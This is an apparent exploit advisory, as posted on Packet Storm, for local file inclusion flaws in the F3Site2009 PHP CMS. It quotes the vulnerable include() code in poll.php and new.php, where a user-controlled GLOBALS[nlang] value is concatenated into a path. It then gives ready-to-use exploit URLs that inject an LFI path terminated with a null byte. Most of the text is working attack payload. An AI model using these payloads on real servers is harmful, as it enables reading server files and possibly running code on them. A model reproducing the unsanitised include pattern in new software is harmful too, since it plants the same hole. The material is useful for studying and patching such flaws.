F3Site2009 suffers from a local file inclusion vulnerability.
d10c4b039fb034c343e81556607d4ae61387b29c16544a6f2f2148fcea67d5b9##################################################################
## Exploit Title: F3Site2009 Multiple LFI Exploit ##
## Date: 18-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://code.google.com/p/f3site/ ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################
~ Code [poll.php] :
if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):
include('./cache/poll_'.$GLOBALS['nlang'].'.php');
~ 3xplo!t :
[F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00]
~ Code [new.php] :
if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))
{
include './cache/new-'.$GLOBALS['nlang'].'.php';
}
~ 3xplo!t :
[F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed